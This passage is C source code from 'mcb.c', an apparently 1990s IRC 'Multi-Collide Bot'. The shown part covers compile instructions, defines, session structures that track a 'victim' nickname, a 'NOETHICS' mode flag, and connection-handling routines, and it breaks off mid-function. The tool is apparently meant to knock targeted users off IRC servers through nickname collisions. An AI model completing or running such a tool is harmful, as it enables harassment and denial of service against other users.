

/*==========================================================*\
|| mcb.c - Multi-Collide Bot v2.0 (beta)                    ||
|| Written by Dr_Delete                                     ||
|| Released for the world to use on 11/15/94                ||
|| Modified a tiny bit by Vassago for use with Serpent 3.06 ||
\*==========================================================*/

/* This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */

/* Compiling examples:

   regular old ANSI/C cc:
	cc -O -s -o mcb mcb.c

   HP-UX cc:
	cc +O3 -Aa -s -DHPSUCKS -o mcb mcb.c

   GNU GCC:

	Linux:
	  gcc -O2 -fomit-frame-pointer -funroll-loops -m486 -s -Wall -o mcb mcb.c

	BSD, SunOS 4.1.x, Slowaris 2.x, NeXT:
	  gcc -O2 -funroll-loops -s -Wall -o mcb mcb.c */

/* -------------------------------------------------------- *\

    To kill this program once it has started, send a
   kill -2 to it's process ID and it'll exit gracefully.

   kill -1 will cause mcb to display a list of it's active
   sessions to stdout.

\* -------------------------------------------------------- */

/*  You may want to tweak some of these defaults, but they
    are controllable on the command line. */

/* Time in which parser will close a pending TCP connection,
   and possibly try again */
#define TCP_TIMEOUT 30

/* Number of times a session is allowed to attempt a TCP
   connection to the server. */
#define MAX_ATTEMPTS     2

/* Number of seconds the parser will wait for a server to
   start once the TCP connection has been made */
#define SRV_TIMEOUT 60

/* Maximum amount of time parser will wait for I/O */
#define MAX_WAITIO  15

/* Maximum amount of time the parser will wait when in NOMULTI mode */
#define MAX_WAITIONM     5

/* Max lines (NICK statements) to send to the server in NOMULTI mode */
#define MAX_NICKS   5

/* Default IRC server port */
#define IRCPORT          6667

/* number of bytes to allocate for socket read buffer */
#define BUFSIZE          400

#ifdef HPSUCKS
#define _INCLUDE_HPUX_SOURCE
#define _INCLUDE_XOPEN_SOURCE
#define _INCLUDE_POSIX_SOURCE
#endif

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <ctype.h>
#include <pwd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/file.h>
#include <arpa/inet.h>

#ifndef sys_errlist
extern char *sys_errlist[];
#endif

#ifndef errno
extern int errno;
#endif

/* global variables */
unsigned short int tcp_timeout=TCP_TIMEOUT;
unsigned short int max_attempts=MAX_ATTEMPTS;
unsigned short int srv_timeout=SRV_TIMEOUT;
unsigned short int max_waitionm=MAX_WAITIONM;
unsigned short int max_nicks=MAX_NICKS;
unsigned short int progmode=0;
char *output_buffer=(char *)0;
char mcbid[25],mcbhost[64];
struct in_addr mcb_addr;

#define PROG_DEBUG  1
#define PROG_VERBOSE     2
#define PROG_NOETHICS    4
#define PROG_NOMULTI     8
#define PROG_HAVESERV    16
#define PROG_IGNORENIU   32
#define PROG_SHOWSOUT    64

struct collide_session {
  int sock;
  unsigned long  int ip;
  unsigned short int status;
  unsigned short int port;
  unsigned short int connect_attempts;
  time_t  tcpstart;
  time_t  srvstart;
  char *server;
  char *token;
  char *victim;
  char *stack;
  char *stack_pointer;
  struct collide_session *next;
} *first_session=(struct collide_session *)0;

struct collide_session *last_session=(struct collide_session *)0;
struct collide_session *active_session=(struct collide_session *)0;

void do_ping(struct collide_session *,char *,char *);
void do_001(struct collide_session *,char *,char *);
void do_error(struct collide_session *,char *,char *);
void do_433(struct collide_session *,char *,char *);
void do_privmsg(struct collide_session *,char *,char *);

struct parsers {
   char *cmd;
   void (*func)(struct collide_session *,char *,char *);
} parsefuns[] = {
   { "PING", (void (*)())do_ping },
   { "001", (void (*)())do_001 },
   { "ERROR",(void (*)())do_error },
   { "433", (void (*)())do_433 },
   { "PRIVMSG", (void (*)())do_privmsg },
   { (char *)0,(void (*)())0 }
};

#define SES_ACTIVE  1
#define SES_INACTIVE     2
#define SES_DELETED 4
#define SES_PENDING 8
#define SES_SAWSERV 16
#define SES_NORETRY 32
#define SES_NICKINUSE    64

char *
mystrerror(int err) {
  return(sys_errlist[err]);
}

void
sig_pipe(void) {
  fprintf(stderr,"mcb: caught a SIGPIPE.\n");
  fflush(stderr);
  signal(SIGPIPE,(void (*)())sig_pipe);
}

void
show_sessions(void) {
  struct collide_session *s=first_session;

  signal(SIGHUP,(void (*)())show_sessions);
  for(;s;s=s->next)
    if(s->status & SES_ACTIVE) {
	 printf("%s: Connection to %s:%hu active.\n",s->victim,s->server,s->port);
	 fflush(stdout);
    }
}

void
cclosed(struct collide_session *session,int errn) {
  if(session->sock) {
    shutdown(session->sock,0);
    close(session->sock);
    session->sock=0;
    printf("%s: Connection to %s:%hu closed. ",session->victim,
		 session->server,session->port);
    if(errn)
	 printf("[%s]\n",mystrerror(errn));
    else
	 puts("");
    fflush(stdout);
  }
  if(progmode & PROG_NOMULTI)
    progmode &= ~PROG_HAVESERV;
  if((session->status & SES_DELETED) || (session->status & SES_NORETRY) ||
	session->connect_attempts>=max_attempts) {
    if(progmode & PROG_DEBUG) {
	 printf("%s: Session flagged for delete.\n",session->victim);
	 fflush(stdout);
    }
    if(progmode & PROG_NOMULTI) {
	 struct collide_session *s=first_session;
	 for(;s;s=s->next)
	   s->status |= SES_DELETED;
    }
    else
	 session->status |= SES_DELETED;
  }
  else {
    session->status |= SES_INACTIVE;
    session->status &= ~SES_PENDING;
    session->status &= ~SES_ACTIVE;
    session->srvstart=session->tcpstart=(time_t)0;
  }
}

void
exit_program(void) {
  if(output_buffer)
    free(output_buffer);

  while(first_session) {
    struct collide_session *cs=first_session->next;

    if(progmode & PROG_DEBUG) {
	 printf("%s: Unallocating session.\n",first_session->victim);
	 fflush(stdout);
    }
    if(first_session->sock)
	 cclosed(first_session,ECONNABORTED);
    if(first_s